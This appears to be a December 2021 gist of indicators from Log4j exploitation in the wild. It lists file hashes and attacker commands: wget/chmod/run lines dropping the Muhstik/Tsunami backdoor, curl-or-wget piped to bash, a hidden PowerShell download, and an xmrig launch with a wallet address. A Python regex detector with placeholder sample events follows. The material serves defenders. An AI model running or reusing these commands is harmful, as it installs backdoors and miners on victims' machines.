Log4j Payload Dropped
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
wget -O /tmp/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
wget -O /tmp/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &
pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898
--> download of Muhstik/Tsunami
(curl || wget -qO -|bash
(curl || wget -qO -|bash
(curl || wget -qO -|bash
m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
--> uses curl on Linux for download of
--> and uses PowerShell on Windows
(new-object System.Net.WebClient).Downloadfile('', 's.cmd')
s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634
--> downloads xmrig
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('','xmrig.exe')
xmrig.exe -o -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
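
A detection sketch for the command shapes listed above, as an added example that is not part of the original gist: it matches process command lines (for example from auditd or EDR process-creation telemetry) against four patterns. The rule names, host names, `placeholder.invalid` URLs, wallet placeholder and sample events are all constructed for illustration.

```python
import re

# Hypothetical rule names; each regex mirrors one command shape from the notes above.
RULES = {
    # wget -O /tmp/X ...; chmod +x|7xx /tmp/X; ...; /tmp/X &   (same path throughout)
    "tmp_download_chmod_exec": re.compile(
        r"wget\s.*-O\s+(?P<path>/tmp/\S+?)[\s;].*"
        r"chmod\s+(?:\+x|7\d\d)\s+(?P=path)\s*;.*(?P=path)\s*&"),
    # curl/wget output piped straight into sh or bash
    "download_piped_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b"),
    # (new-object System.Net.WebClient).DownloadFile(...), any letter case
    "powershell_webclient_downloadfile": re.compile(
        r"new-object\s+System\.Net\.WebClient\)\.DownloadFile\(", re.I),
    # xmrig started with a -u <wallet/user> argument
    "xmrig_miner_args": re.compile(r"\bxmrig(?:\.exe)?\b.*\s-u\s+\S+", re.I),
}

# Constructed sample events (host, command line); URLs and wallet are placeholders.
SAMPLE_EVENTS = [
    ("web01", "wget -O /tmp/pty3 http://placeholder.invalid/pty3; chmod +x /tmp/pty3; "
              "chmod 700 /tmp/pty3; /tmp/pty3 &"),
    ("web02", "(curl -s http://placeholder.invalid/ldm || "
              "wget -qO - http://placeholder.invalid/ldm)|bash"),
    ("win01", "powershell -w hidden -c (new-object System.Net.WebClient)"
              ".Downloadfile('http://placeholder.invalid/xmrig.exe','xmrig.exe')"),
    ("win01", "xmrig.exe -o pool.placeholder.invalid:3333 -u WALLET_PLACEHOLDER -p log"),
    ("build01", "wget -O /tmp/report.csv https://placeholder.invalid/report.csv"),
    ("build01", "curl -s https://placeholder.invalid/health | jq .status"),
]

def classify(cmdline):
    """Return the sorted names of every rule that matches one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(events):
    """Return (host, hits, cmdline) for each event that matches at least one rule."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((host, hits, cmdline))
    return findings

if __name__ == "__main__":
    for host, hits, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)} :: {cmdline}")
```

The last two sample events are benign look-alikes (a plain download to /tmp and a curl piped to jq) and produce no findings.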

hackinghippo commented Dec 15, 2021
